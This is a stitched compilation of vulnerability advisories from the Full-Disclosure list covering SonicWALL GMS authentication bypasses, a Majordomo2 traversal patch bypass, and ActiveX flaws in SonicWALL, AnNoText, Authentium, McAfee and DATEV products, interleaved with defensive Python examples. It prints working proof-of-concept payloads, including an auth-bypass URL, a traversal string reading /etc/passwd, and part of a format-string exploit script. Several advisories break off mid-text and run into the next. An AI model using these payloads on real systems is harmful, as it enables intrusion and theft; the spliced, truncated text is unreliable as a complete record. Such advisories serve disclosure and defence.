[Full-disclosure] NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)
Title:              SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)
Severity:           Critical
CVE-ID:             CVE-2013-1359
CVSS Base Score:    10
Impact:             10
Exploitability:     10
CVSS2 Vector:       AV:N/AC:L/Au:N/C:C/I:C/A:C
Advisory ID:        NSOADV-2013-001
Found Date:         2012-04-26
Date Reported:      2012-12-13
Release Date:       2013-01-17
Author:             Nikolas Sotiriu
Website:            http://sotiriu.de
Twitter:            http://twitter.com/nsoresearch
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2013-001.txt
Vendor:             DELL SonicWALL (http://www.sonicwall.com/)
Affected Products:  GMS
                    Analyzer
                    UMA
                    ViewPoint
Affected Platforms: Windows/Linux
Affected Versions:  GMS/Analyzer/UMA 7.0.x
                    GMS/ViewPoint/UMA 6.0.x
                    GMS/ViewPoint/UMA 5.1.x
                    GMS/ViewPoint 5.0.x
                    GMS/ViewPoint 4.1.x
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu

Background:
===========
The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration.
(Product description from Website)

Description:
============
DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the web interface authentication of the affected product. The vulnerability is caused by a built-in function that skips the session check of the web application: a request to the UMA interface (/appliance/) that carries the parameter skipSessionCheck=1 is served without a valid session. The attacker gains full administrative access to the interface and can execute code with root or SYSTEM permissions, which leads to a full compromise of the system.

Proof of Concept:
=================
http://host/appliance/applianceMainPage?action=status&skipSessionCheck=1

The remote Root/System exploit
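The bypass described above boils down to an authorization check that consults a request parameter. The following is an added example (not GMS code, not from the advisory author): a hypothetical reconstruction of such a check next to a hardened one, and a scanner that picks skipSessionCheck=1 probes against /appliance/ out of access-log lines. The log lines are constructed for the example, and the function and variable names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit


# Hypothetical reconstruction of the flaw (illustrative, not GMS source):
# a request parameter the client controls switches the session check off.
def vulnerable_is_authorized(query_string, session):
    params = parse_qs(query_string)
    if params.get("skipSessionCheck", ["0"])[0] == "1":
        return True  # built-in bypass reachable by any remote client
    return session.get("authenticated") is True


# Hardened form: the decision rests only on server-side session state.
# A test-only bypass belongs in a build that never ships, not behind a parameter.
def hardened_is_authorized(query_string, session):
    del query_string  # deliberately ignored
    return session.get("authenticated") is True


# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [17/Jan/2013:10:21:07 +0100] "GET /appliance/applianceMainPage?action=status HTTP/1.1" 302 0',
    '203.0.113.7 - - [17/Jan/2013:10:21:09 +0100] "GET /appliance/applianceMainPage?action=status&skipSessionCheck=1 HTTP/1.1" 200 5120',
    '198.51.100.2 - - [17/Jan/2013:10:22:00 +0100] "GET /sgms/auth HTTP/1.1" 200 1843',
    '203.0.113.7 - - [17/Jan/2013:10:23:41 +0100] "POST /appliance/applianceMainPage?skipsessioncheck=1&action=status HTTP/1.1" 200 77',
]

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_bypass_probes(lines):
    """(client_ip, request_target, status) for every /appliance/ request that
    carries skipSessionCheck=1. The parameter name is matched case-insensitively
    so a lower-cased probe is not missed; a 200 where an unauthenticated client
    should have been redirected to the login page (302) confirms the bypass."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        if not parts.path.startswith("/appliance/"):
            continue
        params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        if params.get("skipsessioncheck", [""])[0] == "1":
            hits.append((m.group("ip"), target, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    print(vulnerable_is_authorized("action=status&skipSessionCheck=1", {}))  # True
    print(hardened_is_authorized("action=status&skipSessionCheck=1", {}))    # False
    for hit in find_bypass_probes(SAMPLE_ACCESS_LOG):
        print("bypass probe:", hit)
```

Feed `find_bypass_probes` the GMS web server's access log to find out whether the bypass was used before the patch was applied; the pair of a 302 and a following 200 from the same client, as in the constructed sample, is the pattern to look for.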
[Full-disclosure] NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
Title:              SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
Severity:           Critical
CVE-ID:             CVE-2013-1360
CVSS Base Score:    9
Impact:             8.5
Exploitability:     10
CVSS2 Vector:       AV:N/AC:L/Au:N/C:P/I:P/A:C
Advisory ID:        NSOADV-2013-002
Found Date:         2012-04-26
Date Reported:      2012-12-13
Release Date:       2013-01-17
Author:             Nikolas Sotiriu
Website:            http://sotiriu.de
Twitter:            http://twitter.com/nsoresearch
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2013-002.txt
Vendor:             DELL SonicWALL (http://www.sonicwall.com/)
Affected Products:  GMS
                    Analyzer
                    UMA
                    ViewPoint
Affected Platforms: Windows/Linux
Affected Versions:  GMS/Analyzer/UMA 7.0.x
                    GMS/ViewPoint/UMA 6.0.x
                    GMS/ViewPoint/UMA 5.1.x
                    GMS/ViewPoint 5.0.x
                    GMS/ViewPoint 4.1.x
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu

Background:
===========
The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration.
(Product description from Website)

Description:
============
DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the web interface authentication of the affected product. The vulnerability is caused by broken session handling in the password-change process of the web application. An attacker may exploit it by sending a specially crafted request to the SGMS interface (/sgms/). The attacker gains full administrative access to the interface and full control over all managed appliances, which can lead to a full compromise of the organisation.

Proof of Concept:
=================
Access the following URL to log in to the sgms interface:
http://host/sgms/auth
[Full-disclosure] NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)
Title:              Majordomo2 'help' Command Directory Traversal
Severity:           Medium
Advisory ID:        NSOADV-2011-003
CVE:                CVE-2011-0063
Found Date:         03.02.2011
Date Reported:      03.02.2011
Release Date:       19.02.2011
Author:             Nikolas Sotiriu
Mail:               nso-research at sotiriu.de
Website:            http://sotiriu.de/
Twitter:            http://twitter.com/nsoresearch
Advisory-URL:       http://sotiriu.de/adv/NSOADV-2011-003.txt
Vendor/Project:     http://www.mj2.org/
Affected Products:  majordomo2 <= 20110203
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo mailing list manager software by Jason Tibbitts and Michael Yount.

Description:
============
Majordomo2 <= 20110203 is affected by a directory traversal vulnerability because the parameter 'extra' of the 'help' command is not properly sanitized in the function '_list_file_get()'.

The original bug was made public on 03.02.2011 by Michael Brooks of sitewat.ch:
https://sitewat.ch/en/Advisory/View/1
https://bugzilla.mozilla.org/show_bug.cgi?id=628064

I discovered that the patch, which has been in CVS since version 20110125, does not protect against the directory traversal bug:
https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481

The diff introduces the regex '$file =~ s!/?\.\./?!!g;', which deletes '../' from $file. Bypassing this regex is quite simple: use './.../' instead of '../'.

Proof of Concept:
=================
HTTP:
http://target/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=./..././..././..././..././..././..././..././.../etc/passwd

SMTP:
help ./..././..././..././..././..././..././..././.../etc/passwd

Solution:
=========
Update to Majordomo2 >= 20110204
http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz

References:
===========
Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1
Original Bug:       https://bugzilla.mozilla.org/show_bug.cgi?id=628064
Patch Bypass:       https://bugzilla.mozilla.org/show_bug.cgi?id=631307

Disclosure Timeline (YYYY/MM/DD):
=================================
2011.02.03: Patch bypass vulnerability found
2011.02.03: Informed security [at] mozilla.org
2011.02.03: Mozilla opened Bug 631307 in bugzilla
2011.02.03: Jason Tibbitts committed a fix (Sorry again)
2011.02.04: Snapshot available for download
2011.02.04: Discuss the public disclosure
2011.03.04: Got the Bug Bounty Money
2011.03.08: Release of Advisory

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
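The regex bypass explained in the advisory, as an added example that is not Majordomo2's code: the one-pass filter from the 20110125 patch transcribed from Perl to Python, the iterate-until-stable variant people usually try next, a whitelist check that canonicalises the path and refuses anything outside a base directory, and the advisory's eight-step PoC argument run through all three. The base directory is an assumption made for the example; `posixpath` is used so the check is purely lexical and runs the same on every platform.

```python
import posixpath
import re

# Hypothetical base directory standing in for the list's file store; an
# assumption for this example, not a path taken from Majordomo2.
BASE_DIR = "/var/lib/majordomo/lists/GLOBAL/files"


def strip_dotdot_once(path):
    """The filter from the 20110125 patch, transcribed from Perl
    's!/?\\.\\./?!!g'. It removes every '/../', '../', '/..' or '..' in a
    single left-to-right pass, so the characters left behind can themselves
    spell a new '..': './.../' loses its middle '/..' and becomes '../'."""
    return re.sub(r"/?\.\./?", "", path)


def strip_dotdot_until_fixed(path):
    """Repeat the substitution until nothing changes. This closes the './.../'
    bypass but is still a blacklist of one token; prefer resolve_in_base."""
    while True:
        stripped = re.sub(r"/?\.\./?", "", path)
        if stripped == path:
            return stripped
        path = stripped


def resolve_in_base(base, user_path):
    """Whitelist approach: join, normalise lexically, and refuse anything that
    does not stay underneath base. Absolute user paths are rejected as well,
    because posixpath.join discards base when user_path starts with '/'."""
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


# The advisory's PoC 'extra' argument: eight './.../' steps, then etc/passwd.
POC_EXTRA = "./.../" * 8 + "etc/passwd"


def demo():
    """Run the PoC argument through the three filters."""
    return {
        "after_single_pass": strip_dotdot_once(POC_EXTRA),
        "after_fixed_point": strip_dotdot_until_fixed(POC_EXTRA),
        "resolved_in_base": resolve_in_base(BASE_DIR, strip_dotdot_once(POC_EXTRA)),
        "benign_file": resolve_in_base(BASE_DIR, "info"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The single pass turns the PoC into `../../../../../../../../etc/passwd`, which is exactly what the original bug accepted; the canonicalising check rejects it because the normalised path no longer starts with the base directory.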
[Full-disclosure] NSOADV-2010-005: SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
Title:              SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
Severity:           High
Advisory ID:        NSOADV-2010-005
Found Date:         22.02.2010
Date Reported:      09.06.2010
Release Date:       19.08.2010
Author:             Nikolas Sotiriu
Website:            http://sotiriu.de
Twitter:            http://twitter.com/nsoresearch
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2009-005.txt
Vendor:             SonicWALL (http://www.sonicwall.com/)
Affected Products:  SonicWALL SRA EX1600
                    SonicWALL EX7000
                    SonicWALL EX6000
                    SonicWALL EX-1600
                    SonicWALL EX-1500
                    SonicWALL EX-750
Affected Versions:  10.0.4 and all previous versions
                    10.5.1 without hotfix
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       Vendor released a patch
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
SonicWALL has added the award-winning Aventail SSL VPN product line to our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver secure remote access to the most resources from the most end point locations. Aventail was named in the Visionaries Quadrant in the SSL VPN Magic Quadrant Report from Gartner, considered to be the leading analyst firm covering the SSL VPN industry.
(Product description from Website)

Description:
============
Remote exploitation of a format string vulnerability in the End-Point Interrogator/Installer ActiveX control could allow an attacker to execute arbitrary code within the security context of the targeted user. The affected function is AuthCredential. The function ConfigurationString seems to be vulnerable as well, but there the argument is base64-decoded by the control before it reaches the format string.

Name:            End-Point Interrogator/Installer Module
Vendor:          Aventail Corporation
Type:            ActiveX-Control
Version:         10.3.42
Prog ID:         EPILib.EPInterrogator
GUID:            {2A1BE1E7-C550-4D67-A553-7F2D3A39233D}
File:            epi.dll
Folder:          %userprofile%\Application Data\Aventail\epi
Safe for Script: True
Safe for Init:   True

Proof of Concept:
=================
<html>
<head>
<title>SonicWALL E-Class SSL-VPN ActiveX Control DoS PoC</title>
</head>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png">
<input type="button" name="Submit" VALUE="Rule #5 – Shoot First">
</pre>
<object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D' id='obj'></object>
<script language='vbscript'>
Sub Submit_OnClick
eax=String(2, unescape("%u6161"))
arg="%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"
[Full-disclosure] NSOADV-2010-008: AnNoText Third-Party ActiveX Control Buffer Overflow
Title:              AnNoText Third-Party ActiveX Control Buffer Overflow
Severity:           Critical
Advisory ID:        NSOADV-2010-008
Found Date:         18.03.2010
Date Reported:      25.03.2010
Release Date:       11.06.2010
Author:             Nikolas Sotiriu
Mail:               nso-research at sotiriu.de
Website:            http://sotiriu.de/
Twitter:            http://twitter.com/nsoresearch
Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-008.txt
Vendor:             AnNoText (http://www.annotext.de/)
Affected Products:  ADVOAkte 17 Build 4.8.0.116 Patchlevel 034
Affected Component: KEYHELPLib ActiveX Control V.1.1.2200.0
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       unknown (No response from vendor)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
AnNoText is a German company that makes software for lawyers.

Description:
============
During the installation of ADVOAkte an ActiveX control (keyhelp.ocx) is installed in which multiple functions are vulnerable to buffer overflow bugs, which can lead to remote code execution.

Registered Classes:
+------------------
Name:            KeyPopup Class
Vendor:          KeyWorks Software
Type:            ActiveX-Control
Version:         1.1.2200.0
GUID:            {1E57C6C4-B069-11D3-8D43-00104B138C8C}
File:            keyhelp.ocx
Folder:          C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:   False

Name:            KeyScript Class
Vendor:          KeyWorks Software
Type:            ActiveX-Control
Version:         1.1.2200.0
GUID:            {45E66957-2932-432A-A156-31503DF0A681}
File:            keyhelp.ocx
Folder:          C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:   False

Name:            KeyHelp Embedded Window
Vendor:          KeyWorks Software
Type:            ActiveX-Control
Version:         1.1.2200.0
GUID:            {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
File:            keyhelp.ocx
Folder:          C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:   True

Proof of Concept:
=================
http://sotiriu.de/software/NSOPOC-2010-008.zip (coming soon)

Solution:
=========
Disable the vulnerable ActiveX controls by setting the kill bit for the following CLSIDs:
{1E57C6C4-B069-11D3-8D43-00104B138C8C}
{45E66957-2932-432A-A156-31503DF0A681}
{B7ECFD41-BE62-11D2-B9A8-00104B138C8C}

Save the following text as a .REG file and import it to set the kill bit for these controls:
+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1E57C6C4-B069-11D3-8D43-00104B138C8C}]
"Compatibility Flags"=dword:0400
[Full-disclosure] NSOADV-2010-009: AnNoText Third-Party ActiveX Control file overwrite vulnerability
Title:              AnNoText Third-Party ActiveX Control file overwrite vulnerability
Severity:           Low
Advisory ID:        NSOADV-2010-009
Found Date:         18.03.2010
Date Reported:      25.03.2010
Release Date:       11.06.2010
Author:             Nikolas Sotiriu
Mail:               nso-research at sotiriu.de
Website:            http://sotiriu.de/
Twitter:            http://twitter.com/nsoresearch
Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-009.txt
Vendor:             AnNoText (http://www.annotext.de/)
Affected Products:  ADVOMahn Edition 21
Affected Components: IDAutomation Linear BarCode V.1.6.0.6
                     IDautomation PDF417 Barcode V.1.6.0.6
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       unknown (No response from vendor)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
AnNoText is a German company that makes software for lawyers.

Description:
============
During the installation of ADVOMahn two ActiveX controls are installed (IDAutomationLinear6.dll and IDAutomationPDF417_6.dll) in which the functions SaveBarCode and SaveEnhWMF can be used to overwrite arbitrary files.

Controls:
+--------
Name:            IDAutomation Linear BarCode 1.606
Vendor:          IDAutomation.com Inc.
Type:            ActiveX-Control
Version:         1.6.0.6
GUID:            {0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
File:            IDAutomationLinear6.dll
Folder:          C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:   True

Name:            IDautomation PDF417 Barcode
Vendor:          IDAutomation.com Inc.
Type:            ActiveX-Control
Version:         1.6.0.6
GUID:            {E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}
File:            IDAutomationPDF417_6.dll
Folder:          C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:   True

Proof of Concept:
=================
http://sotiriu.de/software/NSOPOC-2010-009.zip (coming soon)

Solution:
=========
Disable the vulnerable ActiveX controls by setting the kill bit for the following CLSIDs:
{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}

Save the following text as a .REG file and import it to set the kill bit for these controls:
+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}]
"Compatibility Flags"=dword:0400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}]
"Compatibility Flags"=dword:0400
+--

More information about how to set the kill bit is available
[Full-disclosure] Security contact SonicWALL
Does anybody know the security contact for SonicWALL?
[Full-disclosure] NSOADV-2010-006: Authentium Command Free Scan ActiveX Control buffer overflow
Title:              Authentium Command On Demand ActiveX Control Buffer Overflow
Severity:           High
Advisory ID:        NSOADV-2010-006
Found Date:         15.02.2010
Date Reported:      22.02.2010
Release Date:       04.03.2010
Author:             Nikolas Sotiriu
Website:            http://sotiriu.de
Twitter:            http://twitter.com/nsoresearch
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2009-006.txt
Vendor:             Authentium (http://www.authentium.com/)
Affected Products:  Authentium Command On Demand Online Scan (http://www.commandondemand.com/)
Affected Component: CSS Web Installer ActiveX V.1.4.9508.605
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       No Patch (See Solution)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
Authentium Command On Demand is a highly-effective, totally free virus scanner. Command on Demand scans for more than half a million Internet threats, using definition files that are updated daily.
(Product description from Website)

Description:
============
Remote exploitation of a buffer overflow vulnerability in the Authentium Command On Demand online scanner service could allow an attacker to execute arbitrary code within the security context of the targeted user. The affected function is InstallProduct1. The functions InstallProduct and InstallProduct2 appear to be vulnerable as well.

Name:            CSS Web Installer Class
Vendor:          Authentium, Inc.
Type:            ActiveX-Control
Version:         1.4.9508.605
Prog ID:         CSSWEBLib.Installer
GUID:            {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:            cssweb.dll
Folder:          C:\WINDOWS\Downloaded Program Files\
Safe for Script: True
Safe for Init:   True
IObjectSafety:   False

Proof of Concept:
=================
http://sotiriu.de/software/NSOPOC-2010-006.zip

Solution:
=========
The product is no longer supported. Disable the vulnerable ActiveX control by setting the kill bit for the following CLSID:
{6CCE3920-3183-4B3D-808A-B12EB769DE12}

Save the following text as a .REG file and import it to set the kill bit for this control:
+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6CCE3920-3183-4B3D-808A-B12EB769DE12}]
"Compatibility Flags"=dword:0400
+--

More information about how to set the kill bit is available in Microsoft Support Document 240797 (http://support.microsoft.com/kb/240797).

Disclosure Timeline (YYYY/MM/DD):
=================================
2010.02.15: Vulnerability found
2010.02.22
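The kill-bit workaround given here and in the two AnNoText advisories (NSOADV-2010-008 and NSOADV-2010-009) is only effective if the value actually lands in the registry with bit 0x400 set. The following is an added example, not from the advisory author or any of the vendors: a parser for the .reg format used above that reports which of the advisory CLSIDs still lack the kill bit, plus an optional live check against the registry via `winreg` when run on Windows. The sample .reg text is constructed for the example (one of the keys deliberately left with the bit unset); the function names are assumptions.

```python
import re

KILL_BIT = 0x400  # FLAG_KILL_BIT in "Compatibility Flags" (Microsoft KB 240797)

KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\Internet Explorer\\"
    r"ActiveX Compatibility\\(\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})\]$",
    re.IGNORECASE,
)
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})$', re.IGNORECASE)


def parse_compat_flags(reg_text):
    """Return {CLSID: flags} for every ActiveX Compatibility key in .reg text
    (the file about to be imported, or a 'reg export' of the key; decode an
    exported file from UTF-16 first). A key without a 'Compatibility Flags'
    value is recorded with flags 0."""
    flags, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            flags.setdefault(current, 0)
            continue
        if line.startswith("["):
            current = None  # some unrelated key
            continue
        m = FLAGS_RE.match(line)
        if m and current is not None:
            flags[current] = int(m.group(1), 16)
    return flags


def missing_kill_bits(reg_text, clsids):
    """The CLSIDs whose kill bit is not set. A bit test rather than an equality
    test, because other compatibility flags may be OR'ed into the same value."""
    found = parse_compat_flags(reg_text)
    return [c for c in clsids if not found.get(c.upper(), 0) & KILL_BIT]


def live_compat_flags(clsid):
    """Same value read from the live registry; None when not on Windows or
    when the key or value does not exist."""
    try:
        import winreg
    except ImportError:
        return None
    path = "SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\" + clsid
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, "Compatibility Flags")
            return int(value)
    except OSError:
        return None


# CLSIDs from the three advisories.
ADVISORY_CLSIDS = [
    "{6CCE3920-3183-4B3D-808A-B12EB769DE12}",  # Authentium CSS Web Installer
    "{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}",  # IDAutomation Linear BarCode
    "{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}",  # IDAutomation PDF417 Barcode
    "{1E57C6C4-B069-11D3-8D43-00104B138C8C}",  # KeyPopup Class
    "{45E66957-2932-432A-A156-31503DF0A681}",  # KeyScript Class
    "{B7ECFD41-BE62-11D2-B9A8-00104B138C8C}",  # KeyHelp Embedded Window
]

# Constructed .reg text: the short dword form used in the advisories, a value
# with an extra flag OR'ed in, and a key whose kill bit was never set.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6CCE3920-3183-4B3D-808A-B12EB769DE12}]
"Compatibility Flags"=dword:0400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}]
"Compatibility Flags"=dword:00000401

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B7ECFD41-BE62-11D2-B9A8-00104B138C8C}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for clsid in missing_kill_bits(SAMPLE_REG, ADVISORY_CLSIDS):
        print("kill bit NOT set in .reg text:", clsid, "live value:", live_compat_flags(clsid))
```

On a 64-bit Windows host the 32-bit Internet Explorer reads the key under Wow6432Node as well, which is why the parser accepts that path; when auditing a live system, check both hives.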
[Full-disclosure] NSOADV-2010-004: McAfee LinuxShield remote/local code execution
Title:              McAfee LinuxShield remote/local code execution
Severity:           Medium
Advisory ID:        NSOADV-2010-004
Found Date:         07.12.2009
Date Reported:      05.02.2010
Release Date:       02.03.2010
Author:             Nikolas Sotiriu (lofi)
Website:            http://sotiriu.de
Twitter:            http://twitter.com/nsoresearch
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2010-004.txt
Vendor:             McAfee (http://www.mcafee.com/)
Affected Products:  McAfee LinuxShield <= 1.5.1
Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192
Remote Exploitable: Yes (attacker must be authenticated)
Local Exploitable:  Yes
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine — the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows-based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed — a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator.
(Product description from LinuxShield Product Guide)

Description:
============
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability, but the attacker must be authenticated. The LinuxShield web interface communicates with the locally installed nailsd daemon, which listens on port 65443/tcp, to make configuration changes, query the configuration and execute tasks. Each user who can log in to the victim box can also authenticate itself
[Full-disclosure] NSOADV-2010-003: DATEV ActiveX Control remote command execution
Title:              DATEV DVBSExeCall ActiveX Control remote command execution
Severity:           Critical
Advisory ID:        NSOADV-2010-003
CVE Number:         CVE-2010-0689
Found Date:         11.01.2010
Date Reported:      28.01.2010
Release Date:       25.02.2010
Author:             Nikolas Sotiriu
Mail:               nso-research at sotiriu.de
Website:            http://sotiriu.de/
Twitter:            http://twitter.com/nsoresearch
Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-003.txt
Vendor:             DATEV (http://www.datev.de/)
Affected Products:  DATEV Base System (Grundpaket Basis)
Affected Component: DVBSExeCall Control ActiveX Control V.1.0.0.1
Remote Exploitable: Yes
Local Exploitable:  No
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
DATEV eG is a German company that makes software for tax advisors and lawyers. The affected base system has to be installed on all systems that run DATEV software.

Description:
============
During the installation of the DATEV Base System (Grundpaket Basis) an ActiveX control (DVBSExeCall.ocx) is installed whose function ExecuteExe is vulnerable to a command execution bug.

Name:            ActiveX control for opening LEXinform and the InfoDB
                 (registered German name: ActiveX-Control zum Öffnen von LEXinform und der InfoDB)
Vendor:          DATEV eG
Type:            ActiveX control
Version:         1.0.0.1
GUID:            {C1CF8B56-3147-41A2-B9BF-79437EED7AFC}
File:            DVBSExeCall.ocx
Folder:          C:\DATEV\PROGRAMM\HLPDVBS\
Safe for Script: True
Safe for Init:   True
IObjectSafety:   False

NOTE: The affected ActiveX control is installed by any DATEV software, so every system with a DATEV installation is vulnerable.

Proof of Concept:
=================
Weaponized PoC demonstration video:
+-- http://sotiriu.de/demos/videos/nso-2010-003.html

Solution:
=========
DATEV Advisory
+- http://www.datev.de/info-db/1080162 (German)
